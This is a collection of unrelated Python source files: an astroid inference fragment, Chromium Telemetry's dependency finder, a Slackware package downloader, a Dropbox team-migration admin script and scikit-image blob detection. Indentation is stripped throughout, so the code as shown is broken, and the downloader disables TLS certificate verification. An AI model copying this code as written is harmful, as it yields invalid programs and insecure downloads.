# a, *b, c = (1, 2)
raise exceptions.InferenceError()
# Unpack iteratively the values from the rhs of the assignment,
# until the find the starred node. What will remain will
# be the list of values which the Starred node will represent
# This is done in two steps, from left to right to remove
# anything before the starred node and from right to left
# to remvoe anything after the starred node.
for index, node in enumerate(lhs.elts):
if not isinstance(node, nodes.Starred):
elts.popleft()
continue
lhs_elts = collections.deque(reversed(lhs.elts[index:]))
for node in lhs_elts:
if not isinstance(node, nodes.Starred):
elts.pop()
continue
# We're done
packed = nodes.List()
packed.elts = elts
packed.parent = self
yield packed
break
nodes.Starred.assigned_stmts = starred_assigned_stmts
|
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import fnmatch
import imp
import logging
import modulefinder
import optparse
import os
import sys
import zipfile
from telemetry import test
from telemetry.core import command_line
from telemetry.core import discover
from telemetry.core import util
from telemetry.page import cloud_storage
from telemetry.util import bootstrap
from telemetry.util import path_set
DEPS_FILE = 'bootstrap_deps'
def _InDirectory(subdirectory, directory):
subdirectory = os.path.realpath(subdirectory)
directory = os.path.realpath(directory)
common_prefix = os.path.commonprefix([subdirectory, directory])
return common_prefix == directory
def FindBootstrapDependencies(base_dir):
deps_file = os.path.join(base_dir, DEPS_FILE)
if not os.path.exists(deps_file):
return []
deps_paths = bootstrap.ListAllDepsPaths(deps_file)
return set(
os.path.realpath(os.path.join(util.GetChromiumSrcDir(), os.pardir, path))
for path in deps_paths)
def FindPythonDependencies(module_path):
logging.info('Finding Python dependencies of %s' % module_path)
# Load the module to inherit its sys.path modifications.
imp.load_source(
os.path.splitext(os.path.basename(module_path))[0], module_path)
# Analyze the module for its imports.
finder = modulefinder.ModuleFinder()
finder.run_script(module_path)
# Filter for only imports in Chromium.
for module in finder.modules.itervalues():
# If it's an __init__.py, module.__path__ gives the package's folder.
module_path = module.__path__[0] if module.__path__ else module.__file__
if not module_path:
continue
module_path = os.path.realpath(module_path)
if not _InDirectory(module_path, util.GetChromiumSrcDir()):
continue
yield module_path
def FindPageSetDependencies(base_dir):
logging.info('Finding page sets in %s' % base_dir)
# Add base_dir to path so our imports relative to base_dir will work.
sys.path.append(base_dir)
tests = discover.DiscoverClasses(base_dir, base_dir, test.Test,
index_by_class_name=True)
for test_class in tests.itervalues():
test_obj = test_class()
# Ensure the test's default options are set if needed.
parser = optparse.OptionParser()
test_obj.AddCommandLineArgs(parser)
options = optparse.Values()
for k, v in parser.get_default_values().__dict__.iteritems():
options.ensure_value(k, v)
# Page set paths are relative to their runner script, not relative to us.
util.GetBaseDir = lambda: base_dir
# TODO: Loading the page set will automatically download its Cloud Storage
# deps. This is really expensive, and we don't want to do this by default.
page_set = test_obj.CreatePageSet(options)
# Add all of its serving_dirs as dependencies.
for serving_dir in page_set.serving_dirs:
yield serving_dir
for page in page_set:
if page.is_file:
yield page.serving_dir
def FindExcludedFiles(files, options):
def MatchesConditions(path, conditions):
for condition in conditions:
if condition(path):
return True
return False
# Define some filters for files.
def IsHidden(path):
for pathname_component in path.split(os.sep):
if pathname_component.startswith('.'):
return True
return False
def IsPyc(path):
return os.path.splitext(path)[1] == '.pyc'
def IsInCloudStorage(path):
return os.path.exists(path + '.sha1')
def MatchesExcludeOptions(path):
for pattern in options.exclude:
if (fnmatch.fnmatch(path, pattern) or
fnmatch.fnmatch(os.path.basename(path), pattern)):
return True
return False
# Collect filters we're going to use to exclude files.
exclude_conditions = [
IsHidden,
IsPyc,
IsInCloudStorage,
MatchesExcludeOptions,
]
# Check all the files against the filters.
for path in files:
if MatchesConditions(path, exclude_conditions):
yield path
def FindDependencies(paths, options):
# Verify arguments.
for path in paths:
if not os.path.exists(path):
raise ValueError('Path does not exist: %s' % path)
dependencies = path_set.PathSet()
# Including __init__.py will include Telemetry and its dependencies.
# If the user doesn't pass any arguments, we just have Telemetry.
dependencies |= FindPythonDependencies(os.path.realpath(
os.path.join(util.GetTelemetryDir(), 'telemetry', '__init__.py')))
dependencies |= FindBootstrapDependencies(util.GetTelemetryDir())
# Add dependencies.
for path in paths:
base_dir = os.path.dirname(os.path.realpath(path))
dependencies.add(base_dir)
dependencies |= FindBootstrapDependencies(base_dir)
dependencies |= FindPythonDependencies(path)
if options.include_page_set_data:
dependencies |= FindPageSetDependencies(base_dir)
# Remove excluded files.
dependencies -= FindExcludedFiles(set(dependencies), options)
return dependencies
def ZipDependencies(paths, dependencies, options):
base_dir = os.path.dirname(os.path.realpath(util.GetChromiumSrcDir()))
with zipfile.ZipFile(options.zip, 'w', zipfile.ZIP_DEFLATED) as zip_file:
# Add dependencies to archive.
for path in dependencies:
path_in_archive = os.path.join(
'telemetry', os.path.relpath(path, base_dir))
zip_file.write(path, path_in_archive)
# Add symlinks to executable paths, for ease of use.
for path in paths:
link_info = zipfile.ZipInfo(
os.path.join('telemetry', os.path.basename(path)))
link_info.create_system = 3 # Unix attributes.
# 010 is regular file, 0111 is the permission bits rwxrwxrwx.
link_info.external_attr = 0100777 << 16 # Octal.
relative_path = os.path.relpath(path, base_dir)
link_script = (
'#!/usr/bin/env python\n\n'
'import os\n'
'import sys\n\n\n'
'script = os.path.join(os.path.dirname(__file__), \'%s\')\n'
'os.execv(sys.executable, [sys.executable, script] + sys.argv[1:])'
% relative_path)
zip_file.writestr(link_info, link_script)
# Add gsutil to the archive, if it's available. The gsutil in
# depot_tools is modified to allow authentication using prodaccess.
# TODO: If there's a gsutil in telemetry/third_party/, bootstrap_deps
# will include it. Then there will be two copies of gsutil at the same
# location in the archive. This can be confusing for users.
gsutil_path = os.path.realpath(cloud_storage.FindGsutil())
if cloud_storage.SupportsProdaccess(gsutil_path):
gsutil_base_dir = os.path.join(os.path.dirname(gsutil_path), os.pardir)
gsutil_dependencies = path_set.PathSet()
gsutil_dependencies.add(os.path.dirname(gsutil_path))
# Also add modules from depot_tools that are needed by gsutil.
gsutil_dependencies.add(os.path.join(gsutil_base_dir, 'boto'))
gsutil_dependencies.add(os.path.join(gsutil_base_dir, 'retry_decorator'))
gsutil_dependencies -= FindExcludedFiles(
set(gsutil_dependencies), options)
# Also add upload.py to the archive from depot_tools, if it is available.
# This allows us to post patches without requiring a full depot_tools
# install. There's no real point in including upload.py if we do not
# also have gsutil, which is why this is inside the gsutil block.
gsutil_dependencies.add(os.path.join(gsutil_base_dir, 'upload.py'))
for path in gsutil_dependencies:
path_in_archive = os.path.join(
'telemetry', os.path.relpath(util.GetTelemetryDir(), base_dir),
'third_party', os.path.relpath(path, gsutil_base_dir))
zip_file.write(path, path_in_archive)
class FindDependenciesCommand(command_line.OptparseCommand):
"""Prints all dependencies"""
@classmethod
def AddCommandLineArgs(cls, parser):
parser.add_option(
'-v', '--verbose', action='count', dest='verbosity',
help='Increase verbosity level (repeat as needed).')
parser.add_option(
'-p', '--include-page-set-data', action='store_true', default=False,
help='Scan tests for page set data and include them.')
parser.add_option(
'-e', '--exclude', action='append', default=[],
help='Exclude paths matching EXCLUDE. Can be used multiple times.')
parser.add_option(
'-z', '--zip',
help='Store files in a zip archive at ZIP.')
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
if args.verbosity >= 2:
logging.getLogger().setLevel(logging.DEBUG)
elif args.verbosity:
logging.getLogger().setLevel(logging.INFO)
else:
logging.getLogger().setLevel(logging.WARNING)
def Run(self, args):
paths = args.positional_args
dependencies = FindDependencies(paths, args)
if args.zip:
ZipDependencies(paths, dependencies, args)
print 'Zip archive written to %s.' % args.zip
else:
print '\n'.join(sorted(dependencies))
return 0
|
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# download.py file is part of spman
#
# spman - Slackware package manager
# Home page: https://github.com/MyRequiem/spman
#
# Copyright (c) 2018 Vladimir MyRequiem Astrakhan, Russia
# <mrvladislavovich@gmail.com>
# All rights reserved
# See LICENSE for details.
"""
Downloading file or directory
"""
from html.parser import HTMLParser
from os import makedirs, path, remove
from shutil import rmtree
from ssl import _create_unverified_context
from sys import stderr, stdout
import requests
from .maindata import MainData
from .utils import error_open_mess, get_remote_file_size, url_is_alive
try:
from tqdm import tqdm
except ImportError:
def tqdm(*args, **kwargs):
if args:
return args[0]
return kwargs.get('iterable', None)
class ListingParser(HTMLParser):
"""
Parses an HTML page and build a list of links in the directory.
Links are stored into the 'links' list.
"""
def __init__(self, url: str):
HTMLParser.__init__(self)
self.__url = url
self.links = []
def handle_starttag(self, tag: str, attrs: list) -> None:
"""
HTMLParser.handle_starttag method redefinition
"""
if tag == 'a':
for key, value in attrs:
if key == 'href' and value:
value = self.resolve_link(value)
if value:
self.links.append(value)
break
def resolve_link(self, link: str) -> str:
"""
discard unnecessary links
"""
if (not link.startswith('/') and
'?' not in link and
'http://' not in link and
'https://' not in link and
'ftp://' not in link):
return '{0}{1}'.format(self.__url, link)
class Download:
"""
Downloading file or directory
"""
def __init__(self,
url: str,
dest: str,
remove_dest: bool = False,
new_file_name: str = ''):
self.meta = MainData()
self.url = url
self.dest = dest
self.downdir = False
self.remove_dest = remove_dest
self.new_file_name = new_file_name
self.links = []
self.dirs = []
self.context = _create_unverified_context()
def start(self) -> None:
"""
start
"""
print(('{0}URL verification...{1}').format(self.meta.clrs['grey'],
self.meta.clrs['reset']))
httpresponse = url_is_alive(self.url)
if not httpresponse:
error_open_mess(self.url)
return
# if content type of url == 'text/html'
# then download the entire directory, else download file
if httpresponse.info().get_content_type() == 'text/html':
self.downdir = True
# add a trailing slash to the URL if it does not exist
if not self.url.endswith('/'):
self.url = '{0}/'.format(self.url)
# add a trailing slash to the destination
# directory if it does not exist
if not self.dest.endswith('/'):
self.dest = '{0}/'.format(self.dest)
if self.downdir:
print(('{0}Creating a list of '
'links...{1}').format(self.meta.clrs['grey'],
self.meta.clrs['reset']))
self.get_links_in_remote_dir(response=httpresponse)
if self.remove_dest and path.isdir(self.dest):
rmtree(self.dest)
for link in self.links:
self.download(link)
else:
self.download(self.url)
def get_links_in_remote_dir(self,
url: str = '',
response: object = False) -> None:
"""
get links in the remote directory
"""
if not response:
response = url_is_alive(url)
if not response:
error_open_mess(url)
else:
url = self.url
if response:
# byte --> str
content = str(response.read(),
encoding=(stdout.encoding or stderr.encoding))
parser = ListingParser(url)
parser.feed(content)
response.close()
for found_link in parser.links:
if not found_link.endswith('/'):
self.links.append(found_link)
elif found_link not in self.dirs:
self.dirs.append(found_link)
if self.dirs:
self.get_links_in_remote_dir(self.dirs.pop())
def download(self, url: str) -> None:
"""
download the file
"""
response = url_is_alive(url)
if not response:
error_open_mess(url)
return
file_name = (self.new_file_name
if self.new_file_name else url.split('/')[-1])
file_size = get_remote_file_size(httpresponse=response)
if self.downdir:
local_dir = ('{0}'
'{1}').format(self.dest,
path.dirname(url.replace(self.url, '')))
if not local_dir.endswith('/'):
local_dir = '{0}/'.format(local_dir)
else:
local_dir = self.dest
local_file = '{0}{1}'.format(local_dir, file_name)
if self.remove_dest and path.isfile(local_file):
remove(local_file)
if not path.isdir(local_dir):
makedirs(local_dir)
first_byte = 0
if path.exists(local_file):
first_byte = path.getsize(local_file)
new_name = (' (renamed to: {0})'.format(self.new_file_name)
if self.new_file_name else '')
print(('{0}Downloading: {1}{2}{7}\nURL: {4}{3}{7}\nto: '
'{4}{5}{6}{7}').format(self.meta.clrs['lyellow'],
self.meta.clrs['lblue'],
path.basename(url),
url,
self.meta.clrs['grey'],
local_dir,
new_name,
self.meta.clrs['reset']))
if not file_size and path.isfile(local_file):
remove(local_file)
if file_size and first_byte >= file_size:
print(('{0}{1} {2}is already fully '
'downloaded{3}').format(self.meta.clrs['cyan'],
local_file,
self.meta.clrs['green'],
self.meta.clrs['reset']))
return
header = {'Range': 'bytes={0}-{1}'.format(first_byte, file_size)}
try:
req = requests.get(url, headers=header, stream=True, timeout=10)
except requests.exceptions.Timeout:
error_open_mess(url)
return
except requests.exceptions.RequestException:
error_open_mess(url)
return
pbar = tqdm(total=file_size,
initial=first_byte,
unit='B',
unit_scale=True,
ncols=80,
ascii=True,
leave=False)
is_tqdm = type(pbar) is tqdm
size_chunk = 4096
with open(local_file, 'ab') as dfile:
for chunk in req.iter_content(chunk_size=size_chunk):
if chunk:
dfile.write(chunk)
if is_tqdm:
pbar.update(size_chunk)
if is_tqdm:
pbar.close()
req.close()
if not dfile.closed:
dfile.close()
if not response.closed:
response.close()
print('{0}Done{1}'.format(self.meta.clrs['lgreen'],
self.meta.clrs['reset']))
|
|
import json
import requests
import pprint # Allows Pretty Print of JSON
import os # Allows for the clearing of the Terminal Window
import csv # Allows outputting to CSV file
import time, datetime
import sys
"""
********************************************************************************************************************
The intention of this script is to:
Iterate through a list of users ( users.csv ), remove that member from the source team (based on the API token provided gFromTeamTOKEN)
returning their account to being a personal individual account.
Then immediately inviting the user to join new team (based on the API token provided gToTeamTOKEN).
NOTE:
CSV file expects email, first name, last name
One user per row
Users in target Team are invited as standard team members. These users will need to ACCEPT the invitation before joining the team.
Once they accept, they will enter the invite flow, and must select option to transfer their content to company.
If you need to promote anyone to an Administrative level, do so using the Admin web pages.
NOTES:
When you remove a team member from a team:
1. Account will be disconnected from the team and converted to an individual account
2. Member will keep unshared files and folders, and shared folders that they own
3. Member won't have access to team-owned folders that they were invited to after joining the team
4. Member will still have access to Paper docs that they own and are private. They will lose access to paper documents that were
shared with them, and also paper documents they owned and shared with others!
By default the script runs in MOCK or test mode. Edit the variable 'gMockRun' to make it run for real.
By default adding users to target team will send them an invite email, edit variable 'gSendWelcomeEmail' to stop this.
Script logs most console content to a file 'logfile.txt' in the location script is executed.
** WARNING **
If you enter incorrect Target Team Token, users accounts could be orphaned as they'll be removed from Source Team but not added to
the Target Team.
Requirements:
Script tested on Python 3.6.5
One Dropbox API Token is needed from each team, source team and target team. Inserted just below this comments section.
Permissions needed on token:
Source Team:
- team_data.member "View structure of your team's and members' folders"
- members.delete "Remove and recover your team members' accounts"
Target Team:
- team_data.member "View structure of your team's and members' folders"
- members.write "View and manage your team membership"
Pre-requisites:
* Scripts requires library 'Requests' - You can install using "pip install requests"
********************************************************************************************************************
"""
gFromTeamTOKEN = '' # Scoped API token for SOURCE team to remove user from
gToTeamTOKEN = '' # Scoped API token for TARGET team to add user to
gMockRun = True # If True the script emulates the actual call to the API so no account moves done
gSendWelcomeEmail = False # If True the script will send a Welcome / invite to user added to target team.
gRetainTeamShares = False # If True, when users removed from source team they will retain access to Dropbox Folders ( not paper folders ) already
# explicitly shared with them (not via group membership)
"""
********************************************************************************************************************
DO NOT EDIT BELOW THIS POINT
********************************************************************************************************************
"""
# Track how long script takes to run
totalTimeStart = datetime.datetime.fromtimestamp(time.time())
# Global Variables
gUsers = []
#############################################
# Function to return a string representation of time taken
#############################################
def getTimeInHoursMinutesSeconds( sec ):
sec = int(sec)
hrs = sec / 3600
sec -= 3600*hrs
mins = sec / 60
sec -= 60*mins
return '%s hrs, %s mins, %s sec' % ( hrs, mins, sec);
#############################################
# Function to print Message to console in a tidy box
#############################################
def printmessageblock( str ):
print ("\n*********************************************************")
print ("* %s" % (str))
print ("*********************************************************\n")
return;
#############################################
# Step 0
# Clear the terminal window, not essential but makes it easier to read this way.
#############################################
os.system('cls' if os.name=='nt' else 'clear')
#############################################
# Step 1
# Check that there's a From and To Token provided.
#############################################
if (len( gFromTeamTOKEN ) <= 0 or len( gToTeamTOKEN ) <=0 ):
printmessageblock ( "It would appear you're missing one of the necessary API Tokens. Ending script." )
exit()
#############################################
# Step 1
# Check if user wants to proceed. This could be distructive in removing users from Team.
#############################################
printmessageblock('Are you sure you wish to proceed with running this script? ')
if (not gMockRun):
print( "If you proceed, team members listed in CSV file and found in the corresponding source API team will be removed from that team.")
print( "Script will attempt then to add them to target team")
else:
print( "You are in MOCK RUN mode so no accounts will be removed or added.")
lsAnswer = input("\nType 'y' to proceed or 'n' to cancel this script: ")
if ( lsAnswer == 'y' or lsAnswer == 'Y'):
print( "\nExecuting script" )
elif ( lsAnswer == 'n' or lsAnswer == 'N'):
print( '\nExiting script\n')
exit()
else:
print("\n\nUser did not enter a 'n' or a 'y' input. Ending script.")
exit();
#############################################
# Step 2
# Note the standard output to console
# Redirect standard output to File until end of script.
#############################################
print ( "Starting script, further outputs to log file." )
# Note the standard output
gstdout = sys.stdout
# Redirect standard output to log file
sys.stdout = open('logfile.txt', 'w')
#############################################
# Step 3
# Get the list of users to remove from source team
# and add to target team
#############################################
# Open a file to read from
with open( 'users.csv', 'r') as csvfileRead:
# Open file to read from
reader = csv.reader(csvfileRead)
gUsers = list(reader)
#############################################
# Step 4
# Iterate through each user,
# uninvite from Source Team
#############################################
# Details for source team
aHeadersSource = {'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % gFromTeamTOKEN}
aURLSource = 'https://api.dropboxapi.com/2/team/members/remove'
# Details for target team
aHeadersTarget = {'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % gToTeamTOKEN}
aURLTarget = 'https://api.dropboxapi.com/2/team/members/add_v2'
for user in gUsers:
aEmailAddress = user[0]
aFirstName = user[1]
aSurname = user[2]
# Set Users Email into parameters
aData = json.dumps({'user': {'.tag': 'email', 'email': aEmailAddress}, 'wipe_data': False, 'keep_account': True, 'retain_team_shares': gRetainTeamShares})
print( "\n------------------------------------------------------------------------" )
print( "Attempting to remove %s from source team." % aEmailAddress)
""" Make the API call """
if ( not gMockRun ):
aResult = requests.post(aURLSource, headers=aHeadersSource, data=aData)
#If we don't get a 200 HTML response code, we didn't get a result.
if( aResult.status_code != 200 ):
print ('-- Failed to remove %s from team. %s' % (aEmailAddress, aResult.text))
continue;
else:
print ('++ Successfully removed %s from team. ' % (aEmailAddress))
else:
print ('++ MOCK RUN: Successfully removed %s from team.' % (aEmailAddress))
##########################################
# Now try invite them to the target team!
##########################################
# Set Users Email into parameters
aData = json.dumps({"new_members": [{
"member_email": aEmailAddress,
"member_given_name": aFirstName,
"member_surname": aSurname,
"send_welcome_email": gSendWelcomeEmail
}],
"force_async": False
})
print( "\nAttempting to add %s to target team." % aEmailAddress)
if ( not gMockRun ):
""" Make the API call """
aResult = requests.post(aURLTarget, headers=aHeadersTarget, data=aData)
# If we don't get a 200 HTML response code, we didn't get a result.
if( aResult.status_code != 200 ):
print ('-- Failed to add %s to target team. %s' % (aEmailAddress, aResult.text))
continue;
else:
print ('++ Successfully added %s to target team.' % (aEmailAddress))
else:
print ('++ MOCK RUN: Successfully added %s to target team.' % (aEmailAddress))
#############################################
# Final step
# 1. Output how long the script took to run.
#############################################
totalTimeStop = datetime.datetime.fromtimestamp(time.time())
totalTimeInSeconds = (totalTimeStop-totalTimeStart).total_seconds()
timeAsStr = getTimeInHoursMinutesSeconds( totalTimeInSeconds )
printmessageblock( " Script finished running, it took %s." % ( timeAsStr ) )
# Put standard output back to console
sys.stdout = gstdout
print( "Script finished")
|
|
import numpy as np
from scipy.ndimage import gaussian_filter, gaussian_laplace
import itertools as itt
import math
from math import sqrt, hypot, log
from numpy import arccos
from ..util import img_as_float
from .peak import peak_local_max
from ._hessian_det_appx import _hessian_matrix_det
from ..transform import integral_image
from .._shared.utils import assert_nD
# This basic blob detection algorithm is based on:
# http://www.cs.utah.edu/~jfishbau/advimproc/project1/ (04.04.2013)
# Theory behind: http://en.wikipedia.org/wiki/Blob_detection (04.04.2013)
def _blob_overlap(blob1, blob2):
"""Finds the overlapping area fraction between two blobs.
Returns a float representing fraction of overlapped area.
Parameters
----------
blob1 : sequence
A sequence of ``(y,x,sigma)``, where ``x,y`` are coordinates of blob
and sigma is the standard deviation of the Gaussian kernel which
detected the blob.
blob2 : sequence
A sequence of ``(y,x,sigma)``, where ``x,y`` are coordinates of blob
and sigma is the standard deviation of the Gaussian kernel which
detected the blob.
Returns
-------
f : float
Fraction of overlapped area.
"""
root2 = sqrt(2)
# extent of the blob is given by sqrt(2)*scale
r1 = blob1[2] * root2
r2 = blob2[2] * root2
d = hypot(blob1[0] - blob2[0], blob1[1] - blob2[1])
if d > r1 + r2:
return 0
# one blob is inside the other, the smaller blob must die
if d <= abs(r1 - r2):
return 1
ratio1 = (d ** 2 + r1 ** 2 - r2 ** 2) / (2 * d * r1)
ratio1 = np.clip(ratio1, -1, 1)
acos1 = arccos(ratio1)
ratio2 = (d ** 2 + r2 ** 2 - r1 ** 2) / (2 * d * r2)
ratio2 = np.clip(ratio2, -1, 1)
acos2 = arccos(ratio2)
a = -d + r2 + r1
b = d - r2 + r1
c = d + r2 - r1
d = d + r2 + r1
area = r1 ** 2 * acos1 + r2 ** 2 * acos2 - 0.5 * sqrt(abs(a * b * c * d))
return area / (math.pi * (min(r1, r2) ** 2))
def _prune_blobs(blobs_array, overlap):
"""Eliminated blobs with area overlap.
Parameters
----------
blobs_array : ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel which detected the blob.
overlap : float
A value between 0 and 1. If the fraction of area overlapping for 2
blobs is greater than `overlap` the smaller blob is eliminated.
Returns
-------
A : ndarray
`array` with overlapping blobs removed.
"""
# iterating again might eliminate more blobs, but one iteration suffices
# for most cases
for blob1, blob2 in itt.combinations(blobs_array, 2):
if _blob_overlap(blob1, blob2) > overlap:
if blob1[2] > blob2[2]:
blob2[2] = -1
else:
blob1[2] = -1
# return blobs_array[blobs_array[:, 2] > 0]
return np.array([b for b in blobs_array if b[2] > 0])
def blob_dog(image, min_sigma=1, max_sigma=50, sigma_ratio=1.6, threshold=2.0,
overlap=.5,):
"""Finds blobs in the given grayscale image.
Blobs are found using the Difference of Gaussian (DoG) method [1]_.
For each blob found, the method returns its coordinates and the standard
deviation of the Gaussian kernel that detected the blob.
Parameters
----------
image : ndarray
Input grayscale image, blobs are assumed to be light on dark
background (white on black).
min_sigma : float, optional
The minimum standard deviation for Gaussian Kernel. Keep this low to
detect smaller blobs.
max_sigma : float, optional
The maximum standard deviation for Gaussian Kernel. Keep this high to
detect larger blobs.
sigma_ratio : float, optional
The ratio between the standard deviation of Gaussian Kernels used for
computing the Difference of Gaussians
threshold : float, optional.
The absolute lower bound for scale space maxima. Local maxima smaller
than thresh are ignored. Reduce this to detect blobs with less
intensities.
overlap : float, optional
A value between 0 and 1. If the area of two blobs overlaps by a
fraction greater than `threshold`, the smaller blob is eliminated.
Returns
-------
A : (n, 3) ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel which detected the blob.
References
----------
.. [1] http://en.wikipedia.org/wiki/Blob_detection#The_difference_of_Gaussians_approach
Examples
--------
>>> from skimage import data, feature
>>> feature.blob_dog(data.coins(), threshold=.5, max_sigma=40)
array([[ 45. , 336. , 16.777216],
[ 52. , 155. , 16.777216],
[ 52. , 216. , 16.777216],
[ 54. , 42. , 16.777216],
[ 54. , 276. , 10.48576 ],
[ 58. , 100. , 10.48576 ],
[ 120. , 272. , 16.777216],
[ 124. , 337. , 10.48576 ],
[ 125. , 45. , 16.777216],
[ 125. , 208. , 10.48576 ],
[ 127. , 102. , 10.48576 ],
[ 128. , 154. , 10.48576 ],
[ 185. , 347. , 16.777216],
[ 193. , 213. , 16.777216],
[ 194. , 277. , 16.777216],
[ 195. , 102. , 16.777216],
[ 196. , 43. , 10.48576 ],
[ 198. , 155. , 10.48576 ],
[ 260. , 46. , 16.777216],
[ 261. , 173. , 16.777216],
[ 263. , 245. , 16.777216],
[ 263. , 302. , 16.777216],
[ 267. , 115. , 10.48576 ],
[ 267. , 359. , 16.777216]])
Notes
-----
The radius of each blob is approximately :math:`\sqrt{2}sigma`.
"""
assert_nD(image, 2)
image = img_as_float(image)
# k such that min_sigma*(sigma_ratio**k) > max_sigma
k = int(log(float(max_sigma) / min_sigma, sigma_ratio)) + 1
# a geometric progression of standard deviations for gaussian kernels
sigma_list = np.array([min_sigma * (sigma_ratio ** i)
for i in range(k + 1)])
gaussian_images = [gaussian_filter(image, s) for s in sigma_list]
# computing difference between two successive Gaussian blurred images
# multiplying with standard deviation provides scale invariance
dog_images = [(gaussian_images[i] - gaussian_images[i + 1])
* sigma_list[i] for i in range(k)]
image_cube = np.dstack(dog_images)
# local_maxima = get_local_maxima(image_cube, threshold)
local_maxima = peak_local_max(image_cube, threshold_abs=threshold,
footprint=np.ones((3, 3, 3)),
threshold_rel=0.0,
exclude_border=False)
# Convert local_maxima to float64
lm = local_maxima.astype(np.float64)
# Convert the last index to its corresponding scale value
lm[:, 2] = sigma_list[local_maxima[:, 2]]
local_maxima = lm
return _prune_blobs(local_maxima, overlap)
def blob_log(image, min_sigma=1, max_sigma=50, num_sigma=10, threshold=.2,
overlap=.5, log_scale=False):
"""Finds blobs in the given grayscale image.
Blobs are found using the Laplacian of Gaussian (LoG) method [1]_.
For each blob found, the method returns its coordinates and the standard
deviation of the Gaussian kernel that detected the blob.
Parameters
----------
image : ndarray
Input grayscale image, blobs are assumed to be light on dark
background (white on black).
min_sigma : float, optional
The minimum standard deviation for Gaussian Kernel. Keep this low to
detect smaller blobs.
max_sigma : float, optional
The maximum standard deviation for Gaussian Kernel. Keep this high to
detect larger blobs.
num_sigma : int, optional
The number of intermediate values of standard deviations to consider
between `min_sigma` and `max_sigma`.
threshold : float, optional.
The absolute lower bound for scale space maxima. Local maxima smaller
than thresh are ignored. Reduce this to detect blobs with less
intensities.
overlap : float, optional
A value between 0 and 1. If the area of two blobs overlaps by a
fraction greater than `threshold`, the smaller blob is eliminated.
log_scale : bool, optional
If set intermediate values of standard deviations are interpolated
using a logarithmic scale to the base `10`. If not, linear
interpolation is used.
Returns
-------
A : (n, 3) ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel which detected the blob.
References
----------
.. [1] http://en.wikipedia.org/wiki/Blob_detection#The_Laplacian_of_Gaussian
Examples
--------
>>> from skimage import data, feature, exposure
>>> img = data.coins()
>>> img = exposure.equalize_hist(img) # improves detection
>>> feature.blob_log(img, threshold = .3)
array([[ 113. , 323. , 1. ],
[ 121. , 272. , 17.33333333],
[ 124. , 336. , 11.88888889],
[ 126. , 46. , 11.88888889],
[ 126. , 208. , 11.88888889],
[ 127. , 102. , 11.88888889],
[ 128. , 154. , 11.88888889],
[ 185. , 344. , 17.33333333],
[ 194. , 213. , 17.33333333],
[ 194. , 276. , 17.33333333],
[ 197. , 44. , 11.88888889],
[ 198. , 103. , 11.88888889],
[ 198. , 155. , 11.88888889],
[ 260. , 174. , 17.33333333],
[ 263. , 244. , 17.33333333],
[ 263. , 302. , 17.33333333],
[ 266. , 115. , 11.88888889]])
Notes
-----
The radius of each blob is approximately :math:`\sqrt{2}sigma`.
"""
assert_nD(image, 2)
image = img_as_float(image)
if log_scale:
start, stop = log(min_sigma, 10), log(max_sigma, 10)
sigma_list = np.logspace(start, stop, num_sigma)
else:
sigma_list = np.linspace(min_sigma, max_sigma, num_sigma)
# computing gaussian laplace
# s**2 provides scale invariance
gl_images = [-gaussian_laplace(image, s) * s ** 2 for s in sigma_list]
image_cube = np.dstack(gl_images)
local_maxima = peak_local_max(image_cube, threshold_abs=threshold,
footprint=np.ones((3, 3, 3)),
threshold_rel=0.0,
exclude_border=False)
# Convert local_maxima to float64
lm = local_maxima.astype(np.float64)
# Convert the last index to its corresponding scale value
lm[:, 2] = sigma_list[local_maxima[:, 2]]
local_maxima = lm
return _prune_blobs(local_maxima, overlap)
def blob_doh(image, min_sigma=1, max_sigma=30, num_sigma=10, threshold=0.01,
overlap=.5, log_scale=False):
"""Finds blobs in the given grayscale image.
Blobs are found using the Determinant of Hessian method [1]_. For each blob
found, the method returns its coordinates and the standard deviation
of the Gaussian Kernel used for the Hessian matrix whose determinant
detected the blob. Determinant of Hessians is approximated using [2]_.
Parameters
----------
image : ndarray
Input grayscale image.Blobs can either be light on dark or vice versa.
min_sigma : float, optional
The minimum standard deviation for Gaussian Kernel used to compute
Hessian matrix. Keep this low to detect smaller blobs.
max_sigma : float, optional
The maximum standard deviation for Gaussian Kernel used to compute
Hessian matrix. Keep this high to detect larger blobs.
num_sigma : int, optional
The number of intermediate values of standard deviations to consider
between `min_sigma` and `max_sigma`.
threshold : float, optional.
The absolute lower bound for scale space maxima. Local maxima smaller
than thresh are ignored. Reduce this to detect less prominent blobs.
overlap : float, optional
A value between 0 and 1. If the area of two blobs overlaps by a
fraction greater than `threshold`, the smaller blob is eliminated.
log_scale : bool, optional
If set intermediate values of standard deviations are interpolated
using a logarithmic scale to the base `10`. If not, linear
interpolation is used.
Returns
-------
A : (n, 3) ndarray
A 2d array with each row representing 3 values, ``(y,x,sigma)``
where ``(y,x)`` are coordinates of the blob and ``sigma`` is the
standard deviation of the Gaussian kernel of the Hessian Matrix whose
determinant detected the blob.
References
----------
.. [1] http://en.wikipedia.org/wiki/Blob_detection#The_determinant_of_the_Hessian
.. [2] Herbert Bay, Andreas Ess, Tinne Tuytelaars, Luc Van Gool,
"SURF: Speeded Up Robust Features"
ftp://ftp.vision.ee.ethz.ch/publications/articles/eth_biwi_00517.pdf
Examples
--------
>>> from skimage import data, feature
>>> img = data.coins()
>>> feature.blob_doh(img)
array([[ 121. , 271. , 30. ],
[ 123. , 44. , 23.55555556],
[ 123. , 205. , 20.33333333],
[ 124. , 336. , 20.33333333],
[ 126. , 101. , 20.33333333],
[ 126. , 153. , 20.33333333],
[ 156. , 302. , 30. ],
[ 185. , 348. , 30. ],
[ 192. , 212. , 23.55555556],
[ 193. , 275. , 23.55555556],
[ 195. , 100. , 23.55555556],
[ 197. , 44. , 20.33333333],
[ 197. , 153. , 20.33333333],
[ 260. , 173. , 30. ],
[ 262. , 243. , 23.55555556],
[ 265. , 113. , 23.55555556],
[ 270. , 363. , 30. ]])
